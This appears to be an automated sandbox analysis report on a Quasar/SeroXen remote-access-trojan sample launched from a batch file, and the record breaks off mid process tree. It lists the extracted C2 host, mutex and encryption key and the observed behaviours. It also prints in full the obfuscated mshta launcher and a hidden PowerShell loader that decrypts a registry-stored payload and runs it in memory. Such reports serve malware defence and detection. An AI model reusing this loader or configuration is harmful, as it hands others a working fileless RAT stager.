Analysis

  • max time kernel
    300s
  • max time network
    296s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-06-2024 15:12

General

  • Target

    DarkMoon_Gen_1-3/starter.bat

  • Size

    51B

  • MD5

    abc778ba27885c72f364ad89b1306862

  • SHA1

    2d4bfe8e2de4390109e8fa786ad47ec68daeaffe

  • SHA256

    97c5438395ba799a673564195db730de8d9742a7a141566fa7c9075c46e3a039

  • SHA512

    65a9bcdb3493526dd0b340aacabd30cd2e577a03cac920341e7be041e8de133ced0ab45c14a2509fbbd6f2451ac3ef1f5d520328d44f06aa4af6bfb122991f8f

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.6 | SeroXen

C2

seroooooxeen.chickenkiller.com:5059

Mutex

f953c0af-702a-46b5-ad07-d900b11c5cd9

Attributes
  • encryption_key

    458790DC6E62EEB3043B4566BF95CDAF711F1EC0

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Windows directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 13 IoCs
  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 55 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{13e79cba-8a92-4d0c-81c3-a2b5c0a4024e}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2888
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{5ca1758b-deb9-462e-8367-768cf7dde266}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3624
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{e1f11d71-60ac-4809-96d0-b066f4867e5b}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4976
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{ffd5144c-da1e-4a02-9077-46fdd324c0cc}
          2⤵
            PID:6008
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{a4035435-0671-42aa-928d-d639d53355c3}
            2⤵
              PID:4176
            • C:\Windows\System32\dllhost.exe
              C:\Windows\System32\dllhost.exe /Processid:{b3afd662-1c33-4ec2-ae4d-f077a945226c}
              2⤵
                PID:2212
              • C:\Windows\System32\dllhost.exe
                C:\Windows\System32\dllhost.exe /Processid:{cd993c8e-b9fb-46a5-b1bd-e754d3bf0206}
                2⤵
                  PID:4576
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 4576 -s 400
                    3⤵
                    • Checks processor information in registry
                    • Enumerates system info in registry
                    PID:5684
                • C:\Windows\System32\dllhost.exe
                  C:\Windows\System32\dllhost.exe /Processid:{b284631b-6801-43c1-9a39-717aeaba006a}
                  2⤵
                    PID:3484
                  • C:\Windows\System32\dllhost.exe
                    C:\Windows\System32\dllhost.exe /Processid:{86bb4222-3e9a-4574-96a8-75d1d1167cfb}
                    2⤵
                      PID:3928
                  • C:\Windows\system32\lsass.exe
                    C:\Windows\system32\lsass.exe
                    1⤵
                      PID:672
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                      1⤵
                        PID:960
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                        1⤵
                          PID:744
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                          1⤵
                            PID:920
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            1⤵
                              PID:1092
                              • C:\Windows\system32\taskhostw.exe
                                taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                2⤵
                                  PID:2552
                                • C:\Windows\$sxr-mshta.exe
                                  C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                                  2⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Modifies registry class
                                  • Suspicious use of WriteProcessMemory
                                  PID:3156
                                  • C:\Windows\$sxr-cmd.exe
                                    "C:\Windows\$sxr-cmd.exe" /c %$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:668
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      4⤵
                                        PID:8
                                      • C:\Windows\$sxr-powershell.exe
                                        C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))
                                        4⤵
                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of SetWindowsHookEx
                                        PID:1064
                                        • C:\Windows\SysWOW64\dllhost.exe
                                          C:\Windows\SysWOW64\dllhost.exe /Processid:{87bfd4c7-5286-45b3-b1d1-1b9e199a85eb}
                                          5⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2900
                                        • C:\Windows\$sxr-powershell.exe
                                          "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1064).WaitForExit();[System.Threading.Thread]::Sleep(5000); function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4712
                                        • C:\Windows\SysWOW64\dllhost.exe
                                          C:\Windows\SysWOW64\dllhost.exe /Processid:{63e95352-5532-4777-8303-3d53f15d13a5}
                                          5⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3236
                                        • C:\Windows\SysWOW64\dllhost.exe
                                          C:\Windows\SysWOW64\dllhost.exe /Processid:{1cbe6018-a611-4b9e-af75-46c1900d6ad4}
                                          5⤵
                                            PID:5108
                                          • C:\Windows\SysWOW64\dllhost.exe
                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{ff42ffba-c7df-4638-bd6a-39b33077e05f}
                                            5⤵
                                              PID:4200
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 456
                                                6⤵
                                                • Drops file in Windows directory
                                                • Program crash
                                                • Checks processor information in registry
                                                • Enumerates system info in registry
                                                PID:3116
                                            • C:\Windows\SysWOW64\dllhost.exe
                                              C:\Windows\SysWOW64\dllhost.exe /Processid:{1d0919ff-34b1-4236-bbfb-d865c5735c02}
                                              5⤵
                                                PID:5552
                                              • C:\Windows\SysWOW64\dllhost.exe
                                                C:\Windows\SysWOW64\dllhost.exe /Processid:{6f6de688-7914-43d8-a4db-a556ae9a9ae7}
                                                5⤵
                                                  PID:3132
                                                • C:\Windows\SysWOW64\dllhost.exe
                                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{01675c55-0a5e-4376-b04a-d8f2d7810415}
                                                  5⤵
                                                    PID:4932
                                                    • C:\Windows\SysWOW64\WerFault.exe
